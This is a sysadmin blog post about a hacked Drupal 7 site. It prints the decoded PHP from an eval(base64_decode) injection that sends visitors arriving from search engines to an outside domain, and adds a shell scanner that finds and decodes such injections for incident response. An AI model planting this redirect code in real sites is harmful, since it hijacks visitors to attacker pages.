
Sys-admin

Securing my Ubuntu Drupal install

  • Nov 20, 2011

Recently, my Drupal 7 site was compromised: most PHP files under /sites/all (the directory where Drupal stores contributed modules and themes) had been modified and injected with this string:


eval(base64_decode("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"));

Here is what the obfuscated code decodes to:


error_reporting(0);
$qazplm=headers_sent();
if( ! $qazplm ) {
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if( $uag ) {
        if( stristr( $referer,"yandex") or stristr( $referer,"yahoo" ) or stristr( $referer,"google" ) or stristr( $referer,"bing" ) or stristr( $referer,"rambler" ) or stristr( $referer,"gogo" )
             or stristr( $referer,"live.com" ) or stristr( $referer,"aport" ) or stristr( $referer,"nigma" ) or stristr( $referer,"webalta" ) or stristr( $referer,"baidu.com" )
             or stristr( $referer,"doubleclick.net" ) or stristr( $referer,"begun.ru" ) or stristr( $referer,"stumbleupon.com" ) or stristr( $referer,"bit.ly" ) or stristr( $referer,"tinyurl.com" )
             or stristr( $referer,"clickbank.net" ) or stristr( $referer,"blogspot.com" ) or stristr( $referer,"myspace.com" ) or stristr( $referer,"facebook.com" ) or stristr( $referer,"aol.com" ) ) {
            if( ! stristr( $referer,"cache" ) or ! stristr( $referer,"inurl" ) ){
                header("Location: http://prsnbrk.osa.pl/");
                exit();
            }
        }
    }
}

This code silences errors, then, as long as no headers have been sent yet and the request carries a User-Agent, checks the HTTP referer: if the visitor arrived from a well-known site (Facebook, Yahoo, Google, ...), it redirects them to http://prsnbrk.osa.pl/. If you type the URL directly, you see nothing unusual. So anyone who finds my site through a Google search gets redirected... Viciously effective...
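To find files carrying this kind of injection on the server, here is a small POSIX shell scanner. It is an added example, not part of the original post: it searches a Drupal tree for the eval(base64_decode(...)) pattern across the file extensions Drupal actually uses for PHP (.php, .module, .inc, .install), and decodes a payload with base64 so it can be read without ever executing it. The demo tree it builds under mktemp, and the placeholder payload inside it, are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): locate PHP files injected with
# eval(base64_decode(...)) under a Drupal tree and decode a payload for review.

# List every PHP-bearing file under $1 that contains eval(base64_decode(
# Drupal keeps PHP in .module/.inc/.install files too, so *.php alone misses most of them.
find_injected_php() {
    grep -rl \
        --include='*.php' --include='*.module' --include='*.inc' --include='*.install' \
        'eval(base64_decode(' "$1" 2>/dev/null
}

# Number of injected files (handy for a cron check that mails when non-zero).
count_injected_php() {
    find_injected_php "$1" | wc -l | tr -d ' '
}

# Pull the base64 string out of the first injected line of file $1 and decode it.
# The output is printed, never passed to php, so the payload is inspected, not run.
decode_payload() {
    sed -n 's|.*eval(base64_decode("\([A-Za-z0-9+/=]*\)")).*|\1|p' "$1" \
        | head -n 1 | base64 -d
}

# --- constructed demo tree: one clean module, two injected files ---
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/sites/all/modules/foo" "$d/sites/all/themes/bar"
    # clean module file
    printf '<?php\nfunction foo_init() {}\n' > "$d/sites/all/modules/foo/foo.module"
    # harmless placeholder payload standing in for the real one
    enc=$(printf '%s' '<?php /* demo payload */ ?>' | base64 | tr -d '\n')
    printf '<?php eval(base64_decode("%s"));\nfunction bar_init() {}\n' "$enc" \
        > "$d/sites/all/themes/bar/template.php"
    printf '<?php eval(base64_decode("%s"));\n' "$enc" \
        > "$d/sites/all/modules/foo/foo.install"
    echo "$d"
}

# Usage on a real install (not run here): find_injected_php /var/www/drupal/sites/all
```

This catches the exact pattern from the post, but attackers vary the wrapper (gzinflate, str_rot13, string concatenation), so treat the scan as a quick triage and compare the tree against a pristine Drupal and module download for anything it misses.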

My 1&1 server was more a dev platform (athome-training.com ...) than a true production-ready server. Security was not a priority, and violating my server must have been a pleasure ... Obviously, I did not care to properly manage my log files, making forensic analysis impossible ...

So I did a factory reset, rebuilt everything from the ground up, reading as much as I could and taking notes on what I did. Here is the account of my road to security... If you see something wrong, please comment ;)